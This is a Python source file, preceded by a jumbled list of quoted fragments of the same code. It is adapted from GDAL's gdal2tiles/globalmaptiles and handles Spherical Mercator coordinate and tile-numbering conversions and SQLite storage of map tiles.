"Base Map and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx", "- 1) - ty def QuadTree(self, tx, ty, zoom ): \"Converts TMS tile", "[] self.db.commit() def readImage(self, x, y, z) : \"\"\" read a single tile", "definition is in the official EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0", "180.0 lat = 180 / math.pi * (2 * math.atan( math.exp( lat *", "Tiles in pyramid lat/lon XY in metres XY pixels Z zoom XYZ from", "mapSize = self.tileSize << zoom py = mapSize - pyr res = self.Resolution(", "the Y direction, which is not visually noticable. How do I create a", "/ 180.0 return mx, my def MetersToLatLon(self, mx, my ): \"Converts XY point", "case you use this class in your product, translate it to another language", "coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon XY in metres", "from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum\" lon = (mx /", "Microsoft Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map", "(ty & mask) != 0: digit += 2 quadKey += str(digit) return quadKey", "TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS / \\ <-> | | <->", "= 32 class GlobalMercator(object): \"\"\" TMS Global Mercator Profile --------------------------- Functions necessary for", "for given zoom level (measured at Equator)\" # return (2 * math.pi *", "tile for given mercator coordinates\" px, py = self.MetersToPixels( mx, my, zoom) return", "* self.originShift / 180.0 return mx, my def MetersToLatLon(self, mx, my ): \"Converts", "new sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite)", "if (tx & mask) != 0: digit += 1 if (ty & mask)", "don't need the extra precision of an ellipsoidal projection. The spherical projection causes", "p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty,", "with Google Maps, Microsoft Virtual Earth, Yahoo Maps, UK Ordnance Survey OpenSpace API,", "px * res - self.originShift my = py * res - self.originShift return", "): \"Converts XY point from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum\"", "Create a new sqlite file from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for", "Functions necessary for generation of global tiles used on the web. It contains", "- ty for i in range(zoom, 0, -1): digit = 0 mask =", "an ellipsoidal projection. The spherical projection causes approximately 0.33 percent scale distortion in", "language or find it usefull for your project please let me know. My", "Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"],", "distortion in the Y direction, which is not visually noticable. How do I", "- 1 ) ty = int( math.ceil( py / float(self.tileSize) ) - 1", "- py def PixelsToTile(self, px, py): \"Returns a tile covering region in given", "SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1,", "(2**zoom - 1) - ty def QuadTree(self, tx, ty, zoom ): \"Converts TMS", "tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels", "for OSGEO. In case you use this class in your product, translate it", "tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type, )) self.minzoom = None self.maxzoom =", "math.pi / 180.0)) - math.pi / 2.0) return lat, lon def PixelsToMeters(self, px,", "from [0,0] in the bottom-left corner, id is XYZ. Google placed the origin", "in the Y direction, which is not visually noticable. How do I create", "\"Converts TMS tile coordinates to Google Tile coordinates\" # coordinate origin is moved", "in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of", "= self.Resolution( zoom ) mx = px * res - self.originShift my =", "Map Tiles as defined in Tile Map Service (TMS) Profiles ============================================================== Functions necessary", "want to scale up def GoogleTile(self, tx, ty, zoom): \"Converts TMS tile coordinates", "image) : \"\"\" write a single tile from string \"\"\" if (x, y,", "i!=0: return i-1 else: return 0 # We don't want to scale up", "values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create", "WGS84 datum, yeh? Yes, all lat/lon we are mentioning should use WGS84 Geodetic", "on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yeh? Yes,", "numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select", "x, y, z, f) : \"\"\" write a single tile from a file", "Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left). What", "website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yeh? Yes, all lat/lon", "MSDN documentation: To simplify the calculations, we use the spherical form of projection,", "yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y,", "tile in latutude/longitude using WGS84 datum\" bounds = self.TileBounds( tx, ty, zoom) minLat,", "\"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type, )) self.minzoom", "bands: 1 grayscale, one alpha mask import sqlite3 import os import math __version__", "in Tile Map Service (TMS) Profiles ============================================================== Functions necessary for generation of global", "projection causes approximately 0.33 percent scale distortion in the Y direction, which is", "counted from [0,0] in the bottom-left corner, id is XYZ. Google placed the", "\"\"\" CREATE TABLE IF NOT EXISTS info ( desc TEXT, tilenumbering TEXT, minzoom", "156543.03392804062 What is the difference between TMS and Google Maps/QuadTree tile name convention?", "y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new sqlite", "tile coordinates are in TMS notation (origin [0,0] in bottom-left). What coordinate conversions", "pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0: return i-1", "projection, not the ellipsoidal form. Since the projection is used only for map", "from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y,", "): \"Maximal scaledown zoom of the pyramid closest to the pixelSize.\" for i", "if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else: return False def close(self): self.commitData(force=True)", "z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs) for xs in", "* math.pi * 6378137 / 2.0 $ echo 180 85 | gdaltransform -s_srs", "GIS tools like gdalwarp, cs2cs or gdaltransform. All of the tools supports -t_srs", "were on the WGS84 ellipsoid. From MSDN documentation: To simplify the calculations, we", "self.tileSize << zoom return px, mapSize - py def PixelsToTile(self, px, py): \"Returns", "this class in your product, translate it to another language or find it", "(mx / self.originShift) * 180.0 lat = (my / self.originShift) * 180.0 lat", "20037508.342789244 * 2 / 256 = 156543.03392804062 What is the difference between TMS", "the pyramid closest to the pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize >", "tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001.", "as defined in Tile Map Service (TMS) Profiles ============================================================== Functions necessary for generation", "on sphere are treated as if the were on the WGS84 ellipsoid. From", "--------- /------------/ KML, public WebMapService Web Clients TileMapService What is the coordinate extent", "single tile from string \"\"\" if (x, y, z) in self.written: return self.written.add((x,", "origin is in the middle of extent. In fact you can calculate the", "def QuadTree(self, tx, ty, zoom ): \"Converts TMS tile coordinates to Microsoft QuadTree\"", "digit = 0 mask = 1 << (i-1) if (tx & mask) !=", "my = my * self.originShift / 180.0 return mx, my def MetersToLatLon(self, mx,", ": \"\"\" read a single tile as string \"\"\" cur = self.db.cursor() cur.execute(\"select", "please let me know. My email: klokan at klokan dot cz. I would", "The spherical projection causes approximately 0.33 percent scale distortion in the Y direction,", "- y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new", "= self.tileSize << zoom return px, mapSize - py def PixelsToTile(self, px, py):", "by 256x256 pixels tile, every lower zoom level resolution is always divided by", "of Code 2008, project GDAL2Tiles for OSGEO. In case you use this class", "return self.PixelsToTile( px, py) def TileBounds(self, tx, ty, zoom): \"Returns bounds of the", "f) #cur.execute('insert into tiles (z, x, y,image) \\ # values (?,?,?,?)', # (z,", "one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\")", "and you can overlay them on top of base maps of those web", "def __init__(self, tileSize=256): \"Initialize the TMS Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution", "32 class GlobalMercator(object): \"\"\" TMS Global Mercator Profile --------------------------- Functions necessary for generation", "Google \\ / | | /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService", "gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude) bigger then 85.05112878 are", "the were on the WGS84 ellipsoid. From MSDN documentation: To simplify the calculations,", "tx, ty, zoom ): \"Converts TMS tile coordinates to Microsoft QuadTree\" quadKey =", "string \"\"\" cur = self.db.cursor() cur.execute(\"select image from tiles where x=? and y=?", "a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z", "= None self.written = set() self.db.commit() self.pending_images = [] def open(self, filename) :", "for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0: return i-1 else:", "Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and", "is moved from bottom-left to top-left corner of the extent return tx, (2**zoom", "a single tile as string \"\"\" cur = self.db.cursor() cur.execute(\"select image from tiles", "self.originShift = 2 * math.pi * 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self,", "if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor()", "VERSION MODIFIED FROM ORIGINAL, come with no warranty # <NAME> # input: vrt", "self.maxzoom: self.maxzoom = z self.commitData() def commitData(self, force = False): if len(self.pending_images) >", "tiles (z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def", "and y=? and z=?\", (x, y, z)) res = cur.fetchone() if res: image", "EXISTS tiles ( x int, y int, z int, s int, image blob,", "TMS tile coordinates to Microsoft QuadTree\" quadKey = \"\" ty = (2**zoom -", "degined as EPSG:3785. WKT definition is in the official EPSG database. Proj4 Text:", "Google placed the origin [0,0] to the top-left corner, reference is XYZ. Microsoft", "maxLon ) def TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon =", "math.log( math.tan((90 + lat) * math.pi / 360.0 )) / (math.pi / 180.0)", "warranty # <NAME> # input: vrt file (-addalpha) in 3857 projection (projection is", "self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for", "TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from", "of an ellipsoidal projection. The spherical projection causes approximately 0.33 percent scale distortion", "Z zoom XYZ from TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS / \\", "given zoom level (measured at Equator)\" # return (2 * math.pi * 6378137)", "or gdaltransform. All of the tools supports -t_srs 'epsg:900913'. For other GIS programs", "What is the coordinate extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]", "Maps/QuadTree tile name convention? The tile raster itself is the same (equal extent,", "17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname,", "readImage(self, x, y, z) : \"\"\" read a single tile as string \"\"\"", "Global Mercator Profile --------------------------- Functions necessary for generation of tiles in Spherical Mercator", "overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme from a BigPlanet", "available under the open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object):", "+x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format of EPGS:900913: PROJCS[\"Google", "Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles", "): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ ,", "bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat, maxLon )", "__doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles as defined in Tile Map Service", "def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom", "we don't need the extra precision of an ellipsoidal projection. The spherical projection", "the origin [0,0] to the top-left corner, reference is XYZ. Microsoft is referencing", ") return ( minx, miny, maxx, maxy ) def TileLatLonBounds(self, tx, ty, zoom", "initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062 What is the difference", "): \"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913\"", "More info at http://spatialreference.org/ref/user/google-projection/ The same projection is degined as EPSG:3785. WKT definition", "self.tileSize = tileSize self.initialResolution = 2 * math.pi * 6378137 / self.tileSize #", "compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and Google", "- GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and Google Earth compatible", "Mercator EPSG:900913\" mx = lon * self.originShift / 180.0 my = math.log( math.tan((90", "which is 40 thousand kilometers, the coordinate origin is in the middle of", "conversions do we need for TMS Global Mercator tiles:: LatLon <-> Meters <->", "<-> Google \\ / | | /--------/ QuadTree ----- --------- /------------/ KML, public", "for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy,", "tiles where x=? and y=? and z=?\", (x, y, z)) res = cur.fetchone()", "overwrite=False): \"\"\" Create a new sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS", "not the ellipsoidal form. Since the projection is used only for map display,", "license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS Global Mercator Profile", "extent. In fact you can calculate the constant as: 2 * math.pi *", "the web clients like Google Maps are projecting those coordinates by Spherical Mercator,", "of the given tile in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize,", "coordinates to Google Tile coordinates\" # coordinate origin is moved from bottom-left to", "math.ceil( px / float(self.tileSize) ) - 1 ) ty = int( math.ceil( py", "projecting those coordinates by Spherical Mercator, so in fact lat/lon coordinates on sphere", "ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys)", "self.pending_images = [] def open(self, filename) : \"\"\" Open an existing file\"\"\" self.filename=filename", "self.db.commit() self.pending_images = [] def open(self, filename) : \"\"\" Open an existing file\"\"\"", "Polar areas with abs(latitude) bigger then 85.05112878 are clipped off. What are zoom", "(EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001. Such tiles are compatible with Google", "def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of the pyramid closest to the", "sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur", "None def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create a new sqlite file", "y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with", "UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the TMS Global Mercator pyramid\" self.tileSize", "self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift = 2 * math.pi *", "ty #def PixelsToRaster(self, px, py, zoom): # \"Move the origin of pixel coordinates", "PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates in given zoom level of pyramid", "self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom is", "Yahoo Maps, UK Ordnance Survey OpenSpace API, ... and you can overlay them", "math.pi * 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts", "in 3857 projection (projection is forced due # to weird effect in AutoCreateWarpedVRT)", "scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x,", "in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001. Such", "def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme", "- self.originShift return mx, my def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to", "bottom-left to top-left corner of the extent return tx, (2**zoom - 1) -", "rouault $ # VERSION MODIFIED FROM ORIGINAL, come with no warranty # <NAME>", "import math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage():", "NOT EXISTS info ( desc TEXT, tilenumbering TEXT, minzoom int, maxzoom int) \"\"\")", "More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google", "can use standard GIS tools like gdalwarp, cs2cs or gdaltransform. All of the", "self.Resolution( zoom ) px = (mx + self.originShift) / res py = (my", "coordinates\" # coordinate origin is moved from bottom-left to top-left corner of the", "for (x, y, z) in res: xx= x zz= 17 - z yy=", "info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google Summer", "def LatLonToMeters(self, lat, lon ): \"Converts given lat/lon in WGS84 Datum to XY", "(2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of the pyramid closest to", "z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom is None or z <", "( x int, y int, z int, s int, image blob, PRIMARY KEY(x,y,z,s))", ") px = (mx + self.originShift) / res py = (my + self.originShift)", "in bottom-left). What coordinate conversions do we need for TMS Global Mercator tiles::", "mx, my, zoom): \"Returns tile for given mercator coordinates\" px, py = self.MetersToPixels(", "sphere are treated as if the were on the WGS84 ellipsoid. From MSDN", "= self.TileBounds( tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon =", "pyramid Tiles in pyramid lat/lon XY in metres XY pixels Z zoom XYZ", "definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is degined", "with TMS numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur =", "to know where it was used. Class is available under the open-source GDAL", "maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\")", "top-left corner, reference is XYZ. Microsoft is referencing tiles by a QuadTree name,", "TEXT, minzoom int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND", "tx, ty, zoom ): \"Returns bounds of the given tile in latutude/longitude using", "overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\") res = cur.fetchall()", "= (my / self.originShift) * 180.0 lat = 180 / math.pi * (2", "= py * res - self.originShift return mx, my def MetersToPixels(self, mx, my,", "0, -1): digit = 0 mask = 1 << (i-1) if (tx &", "the bottom-left corner, id is XYZ. Google placed the origin [0,0] to the", "* 6378137) / (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize", "0 # We don't want to scale up def GoogleTile(self, tx, ty, zoom):", "0, sqlite3.Binary(image))) if self.minzoom is None or z < self.minzoom: self.minzoom = z", "TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates", "Google Maps, Microsoft Virtual Earth, Yahoo Maps, UK Ordnance Survey OpenSpace API, ...", "NOT EXISTS tiles ( x int, y int, z int, s int, image", "open(self, filename) : \"\"\" Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db =", "im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with OSM/Bing/Googlemaps", "= (mx + self.originShift) / res py = (my + self.originShift) / res", "# 2 bands: 1 grayscale, one alpha mask import sqlite3 import os import", "find it usefull for your project please let me know. My email: klokan", "of those web mapping applications. Pixel and tile coordinates are in TMS notation", "[0,0] to the top-left corner, reference is XYZ. Microsoft is referencing tiles by", "project GDAL2Tiles for OSGEO. In case you use this class in your product,", "None self.maxzoom = None self.written = set() self.db.commit() self.pending_images = [] def open(self,", "2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new", "... and you can overlay them on top of base maps of those", "EPSG:900913 .----. --------- -- TMS / \\ <-> | | <-> /----/ <->", "= self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx,", "tile coordinates to Microsoft QuadTree\" quadKey = \"\" ty = (2**zoom - 1)", "$ # VERSION MODIFIED FROM ORIGINAL, come with no warranty # <NAME> #", "overwrite=False): \"\"\" Create a new storage file, overwrite or not if already exists\"\"\"", "Tiles as defined in Tile Map Service (TMS) Profiles ============================================================== Functions necessary for", "lat, lon ): \"Converts given lat/lon in WGS84 Datum to XY in Spherical", "cur.executemany('insert into tiles (z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images = []", "= int( math.ceil( px / float(self.tileSize) ) - 1 ) ty = int(", "on the WGS84 ellipsoid. From MSDN documentation: To simplify the calculations, we use", "in res: xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def", "def Resolution(self, zoom ): \"Resolution (meters/pixel) for given zoom level (measured at Equator)\"", "maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self,", "# (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new", "just different identification of the same raster tile. Tiles in TMS are counted", "cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS tiles ( x int, y int,", "Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else:", "UK Ordnance Survey OpenSpace API, ... and you can overlay them on top", "\"\"\" globalmaptiles.py Global Map Tiles as defined in Tile Map Service (TMS) Profiles", "self.tileSize << zoom # return px, mapSize - py def MetersToTile(self, mx, my,", "GlobalMercator(object): \"\"\" TMS Global Mercator Profile --------------------------- Functions necessary for generation of tiles", "PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the TMS Global Mercator", "with no warranty # <NAME> # input: vrt file (-addalpha) in 3857 projection", "self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z, f) : \"\"\" write a single", "(-addalpha) in 3857 projection (projection is forced due # to weird effect in", "y,image) \\ # values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname,", "target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering", "Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum. Well, the", "math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\"", "\"\"\" write a single tile from string \"\"\" if (x, y, z) in", "<-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in", "SET minzoom = (?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x,", "mapping applications. Pixel and tile coordinates are in TMS notation (origin [0,0] in", "zoom): \"Returns bounds of the given tile in EPSG:900913 coordinates\" minx, miny =", "compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on", "EPSG:3785. WKT definition is in the official EPSG database. Proj4 Text: +proj=merc +a=6378137", "ty, zoom ): \"Returns bounds of the given tile in latutude/longitude using WGS84", "if i!=0: return i-1 else: return 0 # We don't want to scale", "it was used. Class is available under the open-source GDAL license (www.gdal.org). \"\"\"", "those coordinates by Spherical Mercator, so in fact lat/lon coordinates on sphere are", "in self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom", "tx, ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat,", "Well, the web clients like Google Maps are projecting those coordinates by Spherical", "from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs) for", "http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google Summer of Code 2008, project", "def PixelsToTile(self, px, py): \"Returns a tile covering region in given pixel coordinates\"", "= mapSize - pyr res = self.Resolution( zoom ) mx = px *", "ellipsoidal projection. The spherical projection causes approximately 0.33 percent scale distortion in the", "Google Tile coordinates\" # coordinate origin is moved from bottom-left to top-left corner", "single tile as string \"\"\" cur = self.db.cursor() cur.execute(\"select image from tiles where", "Tile coordinates\" # coordinate origin is moved from bottom-left to top-left corner of", "we need for TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels <->", "in res: xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) #", "\"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS Global Mercator Profile --------------------------- Functions", "\"\"\" Sqlite files methods for simple tile storage\"\"\" def __init__(self, type): self.type=type def", "used only for map display, and not for displaying numeric coordinates, we don't", "zoom level constants (pixels/meter) for pyramid with EPSG:900913? whole region is on top", "percent scale distortion in the Y direction, which is not visually noticable. How", "is in the official EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0", "for generation of tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global", "lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913\" mx = lon", "\"\"\" Create a new storage file, overwrite or not if already exists\"\"\" self.filename=filename", "else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE", "sqlite with TMS numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur", "grayscale, one alpha mask import sqlite3 import os import math __version__ = \"$Id:", "> 500 or force: cur = self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image)", "level resolution is always divided by two initialResolution = 20037508.342789244 * 2 /", "maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z, f) :", "to top-left corner of the extent return tx, (2**zoom - 1) - ty", "the TMS Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution = 2 * math.pi", "500 or force: cur = self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image) \\", "2008, project GDAL2Tiles for OSGEO. In case you use this class in your", "#!/usr/bin/env python #****************************************************************************** # From $Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ #", "Create a new sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS')", "force: cur = self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image) \\ values (?,?,?,?,?)',", "EPSG:900913\" mx = lon * self.originShift / 180.0 my = math.log( math.tan((90 +", "OpenLayers Base Map and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation", "\"\"\" TMS Global Mercator Profile --------------------------- Functions necessary for generation of tiles in", "I create a raster in EPSG:900913 and convert 